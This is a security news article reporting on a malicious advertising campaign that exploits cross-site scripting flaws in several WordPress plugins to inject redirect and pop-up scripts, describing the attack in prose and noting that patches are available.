WordPress Plugin Flaws Exploited In Malicious Advertising Campaign
An ongoing malicious advertising campaign is exploiting several WordPress plugin vulnerabilities to redirect website visitors to malicious landing pages. Researchers at Wordfence said that they recently discovered hackers injecting code into websites with the vulnerable plugins in order to display unwanted popup ads, as well as redirect site visitors to tech support scam pages, malicious Android APKs and sketchy pharmaceutical ads. This type of attack is not new. By targeting a few recently disclosed WordPress plugin vulnerabilities, the hackers injected a JavaScript payload into the front end of a victim's site. These injections each contain a short script which sources additional code from one or more third-party URLs. That code is executed when a visitor opens the victim website.
Hackers exploited several, recently disclosed WordPress plugins, such as cross-site scripting vulnerabilities, to launch the attack. One of the targeted vulnerabilities is in the WordPress Coming Soon Page and Maintenance Mode plugin, which has more 7,000 installations and helps users launch website maintenance pages. The plugin has a recently disclosed, cross site scripting vulnerability that enables a hacker to inject JavaScript or HTML code into the blog front-end. While a patch is available, many websites with vulnerable versions 1.7.8 or below have still not updated.
Several other vulnerabilities disclosed over the past few months were also exploited in earlier versions of the malicious advertising campaign. That includes a vulnerability in the Yellow Pencil Visual CSS Style Editor plugin, which has 30,000 installations, disclosed and patched in April, and a flaw in the Blog Designer plugin that was disclosed and patched in May. All of the plugins with vulnerabilities hackers are attempting to exploit either have patches available or have been discontinued by their developers and are unavailable for new installs.
Through exploiting these vulnerabilities, hackers were able to inject a JavaScript payload into the front end of victims' websites. The injections have a short script which sources additional code from third-party URLs, which is then executed when a visitor opens the victim website. When the third-party code executes in a visitor’s browser, it performs an initial redirect to a central domain, which then performs another redirect to a new destination based on a number of factors, notably the type of device in use by the redirected user. In addition to the redirects, hackers were able to inject pop-up ads into victims' sites. The pop-up injection JavaScript code was identified on domains directly associated with the hacker, but researchers said that they also found injections sourcing scripts from legitimate sites which were infected by the hacker by other means.
Plugins continue to be a security hole in WordPress. According to a Imperva report, almost 98 percent of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or a blog. Other recent vulnerabilities found in WordPress plugins include WP Live Chat and Yuzo Related Posts. While the total number of infected websites is unknown, it’s reasonable to expect anyone affected by a newly disclosed XSS flaw in the near future to be at risk. Some plugins hackers are attacking have been removed from the official repository, which makes version install counts hard to assess, and some were never there in the first place. The hackers still probe for months-old vulnerabilities, but quickly adopt new ones as they're being disclosed.